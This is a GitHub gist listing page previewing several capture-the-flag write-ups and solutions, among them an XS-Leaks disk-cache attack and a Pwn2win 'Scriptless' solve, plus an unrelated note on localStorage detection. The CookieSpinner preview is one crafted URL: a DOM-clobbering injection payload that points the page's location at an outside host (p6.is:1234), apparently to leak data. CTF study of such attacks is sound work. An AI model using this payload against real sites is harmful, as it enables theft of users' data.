Skip to content

Instantly share code, notes, and snippets.

View arkark's full-sized avatar
🔏
🚩

Takeshi Kaneko arkark

🔏
🚩
161 followers · 57 following
View GitHub Profile
@parrot409
parrot409 / _writeup.md
Last active December 30, 2025 06:29
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache but how does chrome handle this? I deduced that it uses in-memory disk cache and it's much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to cache miss in incognito mode but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
@po6ix
po6ix / CookieSpinner.md
Last active December 12, 2021 14:34
SECCON CTF 2021 
http://web:3000/?window=parentNode&?window=parentNode&view=%3Cform+id=parentNode+name=parentNode%3E%3Cinput+id=parentNode%3E%3C/form%3E%3Ca+id=parentNode+name=location+href=%22http://p6.is:1234?%22%3E%3C/a%3E%3Cx%20i=%22
@terjanq
terjanq / scriptless_solve.html
Last active June 13, 2020 19:30
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@paulirish
paulirish / gist:5558557
Last active February 26, 2025 18:07
a brief history of detecting local storage

A timeline of the last four years of detecting good old window.localStorage.

Jan Lenhart, bless his heart contributed the first patch for support:

October 2009: 5059daa